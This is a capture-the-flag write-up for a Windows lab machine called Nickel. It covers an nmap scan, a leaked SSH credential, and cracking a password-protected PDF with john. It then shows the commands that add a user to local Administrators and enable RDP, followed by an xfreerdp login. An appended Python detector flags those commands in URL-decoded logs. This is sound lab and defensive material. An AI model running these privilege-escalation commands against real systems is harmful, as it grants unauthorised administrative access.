🪟Nickel

IP: 192.168.66.99

Enumeration

Nmap scan

nmap 192.168.66.99 -p- -sV -Pn

Port 80

Port 3333

Had to get a hint here. All I had to do was add the content length🤦‍♂️

Seems to be a user account ariah:NowiseSloopTheory139 for SSH login.

Shell

Found a file that looks interesting: C:\ftp\Infrastructure.pdf. Had to look at how to copy this over since sending it to wwwtree was messing up the file.

PDF is password protected. Cracked it with john.

Tried making a reverse shell with msfvenom here but it kept crashing whenever the shell would come back.

Added ariah to local admin group on the machine and enabled RDP. Both commands had to be URL encoded to send.

net localgroup Administrators ariah /add

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
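Added example (not part of the original write-up): a defender-side check for the two changes above, run over constructed web-log and process command lines. It URL-decodes each line first, because the commands were sent URL encoded; the rule names, the /example path, the svc_example account and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Rules for the two changes in this write-up, applied after URL-decoding.
RULES = {
    # "net localgroup Administrators <user> /add" (listing the group does not match)
    "local_admin_add": re.compile(
        r'\bnet1?(?:\.exe)?\s+localgroup\s+"?administrators"?\s+.*?/add\b', re.I),
    # "reg add ...\Control\Terminal Server ... fDenyTSConnections ... /d 0" (RDP allowed)
    "rdp_enabled": re.compile(
        r'\breg(?:\.exe)?\s+add\s+.*control\\terminal server'
        r'.*fDenyTSConnections.*/d\s+(?:0x)?0+\b', re.I),
}

def decode_fully(text, max_rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded input is normalised too."""
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text

def detect(line):
    """Return the sorted names of the rules matching one log or command line."""
    normalised = re.sub(r"\s+", " ", decode_fully(line))
    return sorted(name for name, rx in RULES.items() if rx.search(normalised))

# Constructed sample input: web access-log lines and process command lines.
SAMPLES = [
    "GET /example?cmd=net%20localgroup%20Administrators%20svc_example%20%2Fadd HTTP/1.1",
    "GET /example?cmd=reg%20add%20%22HKLM%5CSYSTEM%5CCurrentControlSet%5CControl"
    "%5CTerminal%20Server%22%20%2Fv%20fDenyTSConnections%20%2Ft%20REG_DWORD"
    "%20%2Fd%200%20%2Ff HTTP/1.1",
    "GET /example?cmd=net%2520localgroup%2520Administrators%2520svc_example%2520%252Fadd HTTP/1.1",
    "net localgroup Administrators",  # benign: only lists group members
    r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"'
    r" /v fDenyTSConnections /t REG_DWORD /d 1 /f",  # benign: turns RDP off
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(detect(sample) or "-", "|", sample[:70])
```

On the host itself, the group change is also recorded as Security event 4732 (a member was added to a security-enabled local group) when group-management auditing is on.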

Connected with RDP.

xfreerdp /u:ariah /p:NowiseSloopTheory139 /v:192.168.66.99

Root

Got an admin command prompt.
